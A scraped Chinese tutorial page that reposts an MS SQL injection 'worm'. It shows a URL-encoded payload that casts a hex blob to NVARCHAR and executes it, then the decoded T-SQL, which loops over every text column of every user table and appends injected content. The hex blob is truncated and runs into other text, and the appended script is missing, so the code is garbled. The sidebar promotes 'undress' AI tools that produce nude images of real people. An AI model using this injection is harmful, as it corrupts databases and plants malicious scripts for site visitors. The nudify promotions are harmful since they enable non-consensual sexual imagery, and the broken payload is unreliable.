Home Database Mysql Tutorial 一个MS SQL蠕虫代码_MySQL

一个MS SQL蠕虫代码_MySQL

Jun 01, 2016 pm 01:56 PM
hexadecimal decoding

by ha0k
以下是十六进制转换后的,解码后的文件在下部,这个语句会在网站各个文件末尾插入一句JS 代码。
---------------------------------------------------------------------------------
';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D003100AS20NVARCHAR(4000));EXEC(@S);--
---------------------------------------------------------------------------------

----------------------------------------------------------------------------------

DECLARE @T VARCHAR(255)
DECLARE @C VARCHAR(255)

DECLARE Table_Cursor CURSOR FOR
SELECT [A].[Name], [B].[Name]
FROM sysobjects AS [A], syscolumns AS [B]
WHERE [A].[ID] = [B].[ID] AND

[A].[XType] = 'U' /* Table (User-Defined) */ AND
([B].[XType] = 99 /* NTEXT */ OR
[B].[XType] = 35 /* TEXT */ OR
[B].[XType] = 231 /* SYSNAME */ OR
[B].[XType] = 167 /* VARCHAR */)

OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C

WHILE (@@FETCH_STATUS = 0)

BEGIN
EXEC('UPDATE [' + @T + '] SET [' + @C + '] = RTRIM(CONVERT(VARCHAR, [' + @C + '])) + ''''')
FETCH NEXT FROM Table_Cursor INTO @T, @C
END

CLOSE Table_Cursor
DEALLOCATE Table_Cursor
--------------------------------------------------------------------------------

Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Hot AI Tools

Undresser.AI Undress

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress AI Tool

Undress images for free

Clothoff.io

Clothoff.io

AI clothes remover

AI Hentai Generator

AI Hentai Generator

Generate AI Hentai for free.

Hot Article

R.E.P.O. Energy Crystals Explained and What They Do (Yellow Crystal)
2 weeks ago By 尊渡假赌尊渡假赌尊渡假赌
Hello Kitty Island Adventure: How To Get Giant Seeds
1 months ago By 尊渡假赌尊渡假赌尊渡假赌
Two Point Museum: All Exhibits And Where To Find Them
1 months ago By 尊渡假赌尊渡假赌尊渡假赌

Hot Tools

Notepad++7.3.1

Notepad++7.3.1

Easy-to-use and free code editor

SublimeText3 Chinese version

SublimeText3 Chinese version

Chinese version, very easy to use

Zend Studio 13.0.1

Zend Studio 13.0.1

Powerful PHP integrated development environment

Dreamweaver CS6

Dreamweaver CS6

Visual web development tools

SublimeText3 Mac version

SublimeText3 Mac version

God-level code editing software (SublimeText3)

Base64 encoding and decoding using Python Base64 encoding and decoding using Python Sep 02, 2023 pm 01:49 PM

Let's say you have a binary image file that you want to transfer over the network. You're surprised that the other party didn't receive the file correctly - it just contains weird characters! Well, it looks like you're trying to send the file in raw bits and bytes format, while the media you're using is designed for streaming text. What are the solutions to avoid such problems? The answer is Base64 encoding. In this article, I will show you how to encode and decode binary images using Python. The program is explained as a standalone local program, but you can apply the concept to different applications, such as sending encoded images from a mobile device to a server and many other applications. What is Base64? Before diving into this article, let’s define Base6

How to convert binary to hexadecimal using C language? How to convert binary to hexadecimal using C language? Sep 01, 2023 pm 06:57 PM

Binary numbers are represented by 1s and 0s. The 16-bit hexadecimal number system is {0,1,2,3…..9,A(10),B(11),…F(15)} in order to convert from binary representation to hexadecimal Represents that the bit string ID is grouped into 4-bit chunks, called nibbles starting from the least significant side. Each block is replaced with the corresponding hexadecimal number. Let us see an example to get a clear understanding of hexadecimal and binary number representation. 001111100101101100011101 3 E 5 B&nb

How to implement encoding and decoding of Chinese characters in C language programming? How to implement encoding and decoding of Chinese characters in C language programming? Feb 19, 2024 pm 02:15 PM

In modern computer programming, C language is one of the most commonly used programming languages. Although the C language itself does not directly support Chinese encoding and decoding, we can use some technologies and libraries to achieve this function. This article will introduce how to implement Chinese encoding and decoding in C language programming software. First, to implement Chinese encoding and decoding, we need to understand the basic concepts of Chinese encoding. Currently, the most commonly used Chinese encoding scheme is Unicode encoding. Unicode encoding assigns a unique numeric value to each character so that when calculating

How to reset your PIN How to reset your PIN Feb 18, 2024 pm 09:02 PM

A pin code is a security measure used to protect personal information and devices. However, sometimes we may forget the PIN or need to unlock it. This article will discuss some methods to unlock your PIN code. First, if you have forgotten your device's PIN, you may consider using the reset option provided by your device. For example, with a phone or tablet, you can try to trigger the reset option by entering the wrong PIN multiple times. The specific method may vary depending on the device. You can consult the user manual of the device or find specific reset steps online.

What are the techniques for byte encoding and decoding in Python? What are the techniques for byte encoding and decoding in Python? Oct 18, 2023 am 09:27 AM

What are the techniques for byte encoding and decoding in Python? Byte encoding and decoding are problems we often encounter when processing text data. In Python, there are many built-in functions and modules that help us perform byte encoding and decoding operations. This article will introduce several common byte encoding and decoding techniques and give corresponding code examples. Byte Encoding Using the encode() Function The encode() function is a method in Python used to encode a Unicode string into a sequence of bytes. its general

Try the method to solve the problem of Chinese garbled characters in Eclipse Try the method to solve the problem of Chinese garbled characters in Eclipse Jan 03, 2024 pm 05:28 PM

Are you troubled by Chinese garbled characters in Eclipse? To try these solutions, you need specific code examples 1. Background introduction With the continuous development of computer technology, Chinese plays an increasingly important role in software development. However, many developers encounter garbled code problems when using Eclipse for Chinese development, which affects work efficiency. Then, this article will introduce some common garbled code problems and give corresponding solutions and code examples to help readers solve the Chinese garbled code problem in Eclipse. 2. Common garbled code problems and solution files

Decode the given string by removing recurring characters Decode the given string by removing recurring characters Aug 25, 2023 pm 09:29 PM

The purpose of this article is to implement a program to decode a given string by removing recurring characters. As you know what a string is, a string is nothing but a collection of characters. Additionally, there is no limit to the number of times characters can be repeated in a string. The same character can appear multiple times in a string. In this article, we will find a way to decode a given encoded string str by removing duplicate occurrences. The goal is to decode the provided string str, which has been encoded with one occurrence of 'a', two occurrences of 'b', three occurrences of 'c', four occurrences of 'd', up to 26 occurrences of 'z' . Problem Statement Implement a program to decode a given string by removing duplicate occurrences. Note − Do not ignore spaces that may be included in the letter

Decode a string using PHP's base64_decode() function Decode a string using PHP's base64_decode() function Nov 03, 2023 pm 12:09 PM

In PHP, base64 encoding can be used to convert binary data into printable ASCII characters, thus facilitating data transmission and storage. The base64_decode() function can decode the base64-encoded string into original binary data. The following will provide specific PHP code examples to introduce how to use this function to decode strings. First, you can base64 encode the string using the following code: $str="HelloWorl

See all articles